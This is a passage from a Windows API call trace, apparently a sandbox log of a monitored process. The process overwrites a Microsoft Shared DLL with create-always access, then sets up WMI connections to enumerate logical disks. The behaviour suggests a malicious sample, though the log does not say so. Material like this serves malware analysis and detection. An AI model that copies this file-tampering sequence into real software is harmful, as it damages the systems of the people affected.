CryptReleaseContext (hProv=0x66ba9e8, dwFlags=0x0) returned 1 [0179.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0179.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0179.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0179.036] GetFileType (hFile=0x27c) returned 0x1 [0179.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0179.036] GetFileType (hFile=0x27c) returned 0x1 [0179.036] WriteFile (in: hFile=0x27c, lpBuffer=0x3678dd8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x3678dd8*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0179.037] CloseHandle (hObject=0x27c) returned 1 [0179.038] CoTaskMemAlloc (cb=0x20c) returned 0xb61608 [0179.038] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb61608 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0179.038] CoTaskMemFree (pv=0xb61608) [0179.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0179.038] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0179.038] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0179.039] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0179.039] IUnknown:Release (This=0xb51e34) returned 0x1 [0179.040] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027770) returned 0x0 [0179.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027770, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0179.040] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027770, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6030780) returned 0x0 [0179.040] WbemDefPath:IUnknown:Release (This=0x6027770) returned 0x0 [0179.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6030780) returned 0x0 [0179.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0179.040] WbemDefPath:IUnknown:AddRef (This=0x6030780) returned 0x3 [0179.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0179.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0179.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbb5a18) returned 0x0 [0179.041] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.041] WbemDefPath:IUnknown:Release (This=0xbb5a18) returned 0x3 [0179.041] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0179.041] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0179.041] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0179.041] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x2 [0179.041] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x1 [0179.041] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0179.041] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0179.041] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6030780) returned 0x0 [0179.041] WbemDefPath:IUnknown:AddRef (This=0x6030780) returned 0x3 [0179.041] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x2 [0179.041] WbemDefPath:IWbemPath:SetText (This=0x6030780, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030780, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030780, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030780, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0179.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0179.042] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0179.042] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.042] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0179.042] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0179.042] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0179.042] IUnknown:Release (This=0xb51e34) returned 0x1 [0179.043] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027760) returned 0x0 [0179.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0179.043] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027760, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x60307f0) returned 0x0 [0179.043] WbemDefPath:IUnknown:Release (This=0x6027760) returned 0x0 [0179.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x60307f0) returned 0x0 [0179.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0179.043] WbemDefPath:IUnknown:AddRef (This=0x60307f0) returned 0x3 [0179.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0179.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0179.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbb5958) returned 0x0 [0179.043] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5958, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.043] WbemDefPath:IUnknown:Release (This=0xbb5958) returned 0x3 [0179.043] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0179.044] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0179.044] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0179.044] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x2 [0179.044] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x1 [0179.044] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0179.044] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0179.044] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x60307f0) returned 0x0 [0179.044] WbemDefPath:IUnknown:AddRef (This=0x60307f0) returned 0x3 [0179.044] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x2 [0179.044] WbemDefPath:IWbemPath:SetText (This=0x60307f0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0179.044] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60307f0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0179.044] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0179.044] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.044] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0179.044] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0179.044] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0179.044] IUnknown:Release (This=0xb51e34) returned 0x1 [0179.045] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x601f5b8) returned 0x0 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x601f5b8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0179.045] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f5b8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60277b0) returned 0x0 [0179.045] WbemLocator:IUnknown:Release (This=0x601f5b8) returned 0x0 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60277b0) returned 0x0 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0179.045] WbemLocator:IUnknown:AddRef (This=0x60277b0) returned 0x3 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0179.045] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0179.045] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0179.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0179.045] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x2 [0179.045] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x1 [0179.046] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0179.046] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0179.046] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60277b0) returned 0x0 [0179.046] WbemLocator:IUnknown:AddRef (This=0x60277b0) returned 0x3 [0179.046] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x2 [0179.046] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60307f0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0179.046] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0179.046] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.046] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027610) returned 0x0 [0179.046] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027610, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60333cc) returned 0x0 [0181.123] WbemLocator:IUnknown:QueryInterface (in: This=0x60333cc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b8b4) returned 0x0 [0181.123] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b8b4, pProxy=0x60333cc, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0181.123] WbemLocator:IUnknown:Release (This=0xb5b8b4) returned 0x1 [0181.123] WbemLocator:IUnknown:QueryInterface (in: This=0x60333cc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b8d4) returned 0x0 [0181.123] WbemLocator:IUnknown:QueryInterface (in: This=0x60333cc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b8b4) returned 0x0 [0181.123] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b8b4, pProxy=0x60333cc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0181.123] WbemLocator:IUnknown:Release (This=0xb5b8b4) returned 0x2 [0181.124] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x1 [0181.124] CoTaskMemFree (pv=0xbd4a68) [0181.124] WbemLocator:IUnknown:Release (This=0x6027610) returned 0x0 [0181.692] WbemLocator:IUnknown:QueryInterface (in: This=0x60333cc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b8d4) returned 0x0 [0181.692] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0181.741] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: 